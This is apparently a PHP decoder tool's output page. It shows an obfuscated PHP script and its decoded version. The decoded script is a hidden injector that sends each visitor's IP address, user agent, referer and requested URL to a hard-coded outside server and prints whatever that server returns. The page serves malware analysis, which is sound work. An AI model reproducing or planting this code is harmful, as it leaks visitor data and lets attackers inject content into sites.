Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php /* obfuscated by phpObfuscator.cn */ ob_start(); set_time_limit(3600); ini_set("\1..

Decoded Output download

<?php 
/* obfuscated by phpObfuscator.cn */ 
ob_start(); set_time_limit(3600); ini_set("display_errors", "Off"); ini_set("allow_url_fopen", "On"); ignore_user_abort(1); function getClientIP() { goto lVERyqV; lVERyqs: foreach ($liHyHq as $liHyHR) { goto lVERyqa; lVERyqa: if (!(isset($_SERVER[$liHyHR]) && filter_var($_SERVER[$liHyHR], FILTER_VALIDATE_IP))) { goto lVERyqy; } goto lVERyqH; lVERyqk: lVERyqy: goto lVERyqB; lVERyqH: return $_SERVER[$liHyHR]; goto lVERyqk; lVERyqB: } goto lVERyql; lVERyqV: $liHyHq = array("HTTP_CF_CONNECTING_IP", "HTTP_CLIENT_IP", "HTTP_X_FORWARDED_FOR", "HTTP_X_FORWARDED", "HTTP_X_CLUSTER_CLIENT_IP", "HTTP_FORWARDED_FOR", "HTTP_FORWARDED", "REMOTE_ADDR"); goto lVERyqs; lVERyql: return "0.0.0.0"; goto lVERyqE; lVERyqE: } function fetchRemoteContent($liHyHy, $liHyHa, $liHyHH) { goto lVERyqF; lVERyqi: goto lVERyqP; goto lVERyRq; lVERyRy: lVERyqP: goto lVERyRa; lVERyRq: lVERyqn: goto lVERyRR; lVERyRR: return fetchRemoteContentWithCurl($liHyHy, $liHyHa, $liHyHH); goto lVERyRy; lVERyqW: return fetchRemoteContentWithFileGetContents($liHyHy, $liHyHa, $liHyHH); goto lVERyqi; lVERyqF: if (function_exists("curl_init")) { goto lVERyqn; } goto lVERyqW; lVERyRa: } function fetchRemoteContentWithCurl($liHyHy, $liHyHa, $liHyHH) { goto lVERyRH; lVERyyq: return array("code" => $liHyHV, "body" => $liHyHB); goto lVERyyR; lVERyRE: curl_setopt($liHyHk, CURLOPT_REFERER, $liHyHH); goto lVERyRn; lVERyRk: curl_setopt($liHyHk, CURLOPT_URL, $liHyHy); goto lVERyRB; lVERyRH: $liHyHk = curl_init(); goto lVERyRk; lVERyRl: curl_setopt($liHyHk, CURLOPT_USERAGENT, $liHyHa); goto lVERyRE; lVERyRn: curl_setopt($liHyHk, CURLOPT_SSL_VERIFYPEER, FALSE); goto lVERyRP; lVERyRB: curl_setopt($liHyHk, CURLOPT_HEADER, 0); goto lVERyRV; lVERyRs: curl_setopt($liHyHk, CURLOPT_RETURNTRANSFER, 1); goto lVERyRl; lVERyRi: curl_close($liHyHk); goto lVERyyq; lVERyRP: curl_setopt($liHyHk, CURLOPT_SSL_VERIFYHOST, FALSE); goto lVERyRF; lVERyRV: curl_setopt($liHyHk, CURLOPT_TIMEOUT, 30); goto lVERyRs; lVERyRW: $liHyHV = curl_getinfo($liHyHk, CURLINFO_HTTP_CODE); goto lVERyRi; lVERyRF: $liHyHB = curl_exec($liHyHk); goto lVERyRW; lVERyyR: } function fetchRemoteContentWithFileGetContents($liHyHy, $liHyHa, $liHyHH) { goto lVERyyi; lVERyay: $liHyHn = null; goto lVERyaa; lVERyyi: $liHyHs = array("http" => array("method" => "GET", "header" => "User-Agent: {$liHyHa}
" . "Referer: {$liHyHH}
", "timeout" => 30, "ignore_errors" => true), "ssl" => array("verify_peer" => false, "verify_peer_name" => false)); goto lVERyaq; lVERyaq: $liHyHl = stream_context_create($liHyHs); goto lVERyaR; lVERyaR: $liHyHE = @file_get_contents($liHyHy, false, $liHyHl); goto lVERyay; lVERyak: lVERyyW: goto lVERyaB; lVERyaH: foreach ($http_response_header as $liHyHP) { goto lVERyyB; lVERyyP: lVERyyk: goto lVERyyF; lVERyyl: $liHyHn = intval($liHyHF[1]); goto lVERyyE; lVERyyV: $liHyHF = explode(" ", $liHyHP); goto lVERyys; lVERyyE: lVERyyH: goto lVERyyn; lVERyyn: break; goto lVERyyP; lVERyys: if (!(count($liHyHF) > 1)) { goto lVERyyH; } goto lVERyyl; lVERyyB: if (!(strpos($liHyHP, "HTTP/") === 0)) { goto lVERyyk; } goto lVERyyV; lVERyyF: } goto lVERyak; lVERyaB: return array("code" => $liHyHn, "body" => $liHyHE); goto lVERyaV; lVERyaa: if (!(isset($http_response_header) && is_array($http_response_header))) { goto lVERyyW; } goto lVERyaH; lVERyaV: } $liHyHa = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "null"; $liHyHH = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "null"; $liHyHW = getClientIP(); $liHyHi = "https://148.113.0.12/tag.php"; $liHykq = isset($_GET["id"]) ? $_GET["id"] : (isset($_GET["ID"]) ? $_GET["ID"] : ''); $liHykR = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : (isset($_SERVER["HTTP_X_FORWARDED_HOST"]) ? $_SERVER["HTTP_X_FORWARDED_HOST"] : ''); $liHyky = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : (isset($_SERVER["HTTP_X_REWRITE_URL"]) ? $_SERVER["HTTP_X_REWRITE_URL"] : ''); try { goto lVERyal; lVERyai: exit; goto lVERyHq; lVERyaP: header("HTTP/1.0 404 Not Found"); goto lVERyaF; lVERyaW: echo $liHyHB["body"]; goto lVERyai; lVERyaE: $liHyHB = fetchRemoteContent($liHyka, $liHyHa, $liHyHH); goto lVERyan; lVERyaF: lVERyas: goto lVERyaW; lVERyan: if (!($liHyHB["code"] == 404)) { goto lVERyas; } goto lVERyaP; lVERyal: $liHyka = $liHyHi . "?" . http_build_query(array("id" => $liHykq, "ip" => $liHyHW, "file" => urlencode($liHyky), "host" => urlencode($liHykR), "referer" => urlencode($liHyHH))); goto lVERyaE; lVERyHq: } catch (Exception $liHykH) { } ob_end_flush(); ?>

Did this file decode correctly?

Original Code

<?php
/* obfuscated by phpObfuscator.cn */
ob_start(); set_time_limit(3600); ini_set("\144\151\163\160\x6c\x61\171\x5f\145\x72\162\x6f\162\x73", "\117\146\146"); ini_set("\141\x6c\x6c\157\x77\137\x75\162\154\x5f\146\157\160\145\156", "\117\156"); ignore_user_abort(1); function getClientIP() { goto lVERyqV; lVERyqs: foreach ($liHyHq as $liHyHR) { goto lVERyqa; lVERyqa: if (!(isset($_SERVER[$liHyHR]) && filter_var($_SERVER[$liHyHR], FILTER_VALIDATE_IP))) { goto lVERyqy; } goto lVERyqH; lVERyqk: lVERyqy: goto lVERyqB; lVERyqH: return $_SERVER[$liHyHR]; goto lVERyqk; lVERyqB: } goto lVERyql; lVERyqV: $liHyHq = array("\x48\124\124\x50\x5f\103\106\x5f\103\x4f\116\x4e\x45\103\124\111\x4e\107\x5f\x49\120", "\x48\124\124\120\137\103\x4c\x49\105\x4e\124\x5f\111\120", "\110\x54\124\x50\137\x58\x5f\x46\x4f\x52\127\101\x52\104\x45\x44\137\106\x4f\x52", "\110\124\x54\x50\137\x58\x5f\x46\x4f\x52\127\x41\x52\x44\x45\x44", "\110\x54\x54\120\x5f\x58\x5f\x43\114\x55\123\124\105\x52\x5f\103\114\111\x45\x4e\x54\x5f\111\120", "\110\x54\x54\x50\x5f\x46\x4f\122\127\101\122\104\105\104\x5f\x46\117\x52", "\x48\124\124\120\x5f\106\x4f\x52\x57\x41\x52\x44\105\104", "\122\x45\115\x4f\x54\x45\137\101\104\104\122"); goto lVERyqs; lVERyql: return "\60\56\60\56\x30\x2e\x30"; goto lVERyqE; lVERyqE: } function fetchRemoteContent($liHyHy, $liHyHa, $liHyHH) { goto lVERyqF; lVERyqi: goto lVERyqP; goto lVERyRq; lVERyRy: lVERyqP: goto lVERyRa; lVERyRq: lVERyqn: goto lVERyRR; lVERyRR: return fetchRemoteContentWithCurl($liHyHy, $liHyHa, $liHyHH); goto lVERyRy; lVERyqW: return fetchRemoteContentWithFileGetContents($liHyHy, $liHyHa, $liHyHH); goto lVERyqi; lVERyqF: if (function_exists("\x63\165\162\x6c\x5f\x69\156\151\164")) { goto lVERyqn; } goto lVERyqW; lVERyRa: } function fetchRemoteContentWithCurl($liHyHy, $liHyHa, $liHyHH) { goto lVERyRH; lVERyyq: return array("\143\157\144\x65" => $liHyHV, "\x62\x6f\144\x79" => $liHyHB); goto lVERyyR; lVERyRE: curl_setopt($liHyHk, CURLOPT_REFERER, $liHyHH); goto lVERyRn; lVERyRk: curl_setopt($liHyHk, CURLOPT_URL, $liHyHy); goto lVERyRB; lVERyRH: $liHyHk = curl_init(); goto lVERyRk; lVERyRl: curl_setopt($liHyHk, CURLOPT_USERAGENT, $liHyHa); goto lVERyRE; lVERyRn: curl_setopt($liHyHk, CURLOPT_SSL_VERIFYPEER, FALSE); goto lVERyRP; lVERyRB: curl_setopt($liHyHk, CURLOPT_HEADER, 0); goto lVERyRV; lVERyRs: curl_setopt($liHyHk, CURLOPT_RETURNTRANSFER, 1); goto lVERyRl; lVERyRi: curl_close($liHyHk); goto lVERyyq; lVERyRP: curl_setopt($liHyHk, CURLOPT_SSL_VERIFYHOST, FALSE); goto lVERyRF; lVERyRV: curl_setopt($liHyHk, CURLOPT_TIMEOUT, 30); goto lVERyRs; lVERyRW: $liHyHV = curl_getinfo($liHyHk, CURLINFO_HTTP_CODE); goto lVERyRi; lVERyRF: $liHyHB = curl_exec($liHyHk); goto lVERyRW; lVERyyR: } function fetchRemoteContentWithFileGetContents($liHyHy, $liHyHa, $liHyHH) { goto lVERyyi; lVERyay: $liHyHn = null; goto lVERyaa; lVERyyi: $liHyHs = array("\150\164\x74\160" => array("\x6d\x65\x74\x68\157\x64" => "\107\x45\124", "\150\x65\141\144\x65\x72" => "\x55\x73\x65\x72\55\101\147\145\156\164\72\x20{$liHyHa}\15\12" . "\x52\145\x66\x65\x72\x65\x72\72\x20{$liHyHH}\15\12", "\x74\151\x6d\x65\x6f\x75\x74" => 30, "\x69\x67\x6e\x6f\x72\145\x5f\145\162\162\157\x72\163" => true), "\163\x73\154" => array("\x76\x65\162\151\146\171\137\160\x65\145\162" => false, "\x76\145\162\151\146\171\x5f\160\x65\x65\162\x5f\156\141\155\x65" => false)); goto lVERyaq; lVERyaq: $liHyHl = stream_context_create($liHyHs); goto lVERyaR; lVERyaR: $liHyHE = @file_get_contents($liHyHy, false, $liHyHl); goto lVERyay; lVERyak: lVERyyW: goto lVERyaB; lVERyaH: foreach ($http_response_header as $liHyHP) { goto lVERyyB; lVERyyP: lVERyyk: goto lVERyyF; lVERyyl: $liHyHn = intval($liHyHF[1]); goto lVERyyE; lVERyyV: $liHyHF = explode("\40", $liHyHP); goto lVERyys; lVERyyE: lVERyyH: goto lVERyyn; lVERyyn: break; goto lVERyyP; lVERyys: if (!(count($liHyHF) > 1)) { goto lVERyyH; } goto lVERyyl; lVERyyB: if (!(strpos($liHyHP, "\x48\124\124\x50\57") === 0)) { goto lVERyyk; } goto lVERyyV; lVERyyF: } goto lVERyak; lVERyaB: return array("\x63\x6f\x64\x65" => $liHyHn, "\142\x6f\144\171" => $liHyHE); goto lVERyaV; lVERyaa: if (!(isset($http_response_header) && is_array($http_response_header))) { goto lVERyyW; } goto lVERyaH; lVERyaV: } $liHyHa = isset($_SERVER["\x48\x54\124\120\x5f\125\123\105\x52\137\101\x47\105\x4e\x54"]) ? $_SERVER["\110\124\x54\x50\137\125\123\105\122\137\101\x47\105\x4e\124"] : "\156\x75\154\x6c"; $liHyHH = isset($_SERVER["\x48\x54\124\x50\x5f\122\x45\x46\105\122\105\122"]) ? $_SERVER["\110\124\124\120\x5f\x52\105\x46\x45\122\105\x52"] : "\156\x75\x6c\154"; $liHyHW = getClientIP(); $liHyHi = "\150\164\164\160\x73\x3a\57\x2f\x31\x34\70\56\61\x31\x33\56\60\x2e\x31\x32\x2f\164\x61\x67\56\x70\150\x70"; $liHykq = isset($_GET["\x69\144"]) ? $_GET["\x69\x64"] : (isset($_GET["\111\104"]) ? $_GET["\111\x44"] : ''); $liHykR = isset($_SERVER["\x48\124\x54\120\137\x48\117\x53\x54"]) ? $_SERVER["\x48\124\x54\120\137\x48\117\x53\x54"] : (isset($_SERVER["\110\124\124\120\137\x58\x5f\x46\117\x52\127\101\x52\104\x45\104\137\110\x4f\123\x54"]) ? $_SERVER["\x48\x54\x54\120\137\x58\137\106\x4f\x52\x57\x41\x52\x44\105\x44\137\110\x4f\123\124"] : ''); $liHyky = isset($_SERVER["\x52\105\x51\x55\105\x53\x54\x5f\x55\x52\111"]) ? $_SERVER["\x52\x45\x51\x55\x45\x53\x54\137\125\x52\x49"] : (isset($_SERVER["\110\124\x54\x50\137\130\137\x52\x45\127\122\x49\124\105\137\125\122\x4c"]) ? $_SERVER["\110\124\x54\x50\x5f\x58\137\x52\x45\x57\122\x49\124\x45\x5f\x55\x52\114"] : ''); try { goto lVERyal; lVERyai: exit; goto lVERyHq; lVERyaP: header("\110\124\x54\x50\57\61\x2e\60\x20\64\60\x34\x20\116\x6f\164\40\106\x6f\x75\156\144"); goto lVERyaF; lVERyaW: echo $liHyHB["\x62\x6f\x64\171"]; goto lVERyai; lVERyaE: $liHyHB = fetchRemoteContent($liHyka, $liHyHa, $liHyHH); goto lVERyan; lVERyaF: lVERyas: goto lVERyaW; lVERyan: if (!($liHyHB["\143\x6f\x64\145"] == 404)) { goto lVERyas; } goto lVERyaP; lVERyal: $liHyka = $liHyHi . "\x3f" . http_build_query(array("\151\144" => $liHykq, "\x69\160" => $liHyHW, "\146\x69\x6c\x65" => urlencode($liHyky), "\x68\157\x73\x74" => urlencode($liHykR), "\x72\145\x66\x65\162\145\162" => urlencode($liHyHH))); goto lVERyaE; lVERyHq: } catch (Exception $liHykH) { } ob_end_flush();

Function Calls

None

Variables

None

Stats

MD5	f774832da4fda06467aa4682a5632f20
Eval Count	0
Decode Time	63 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats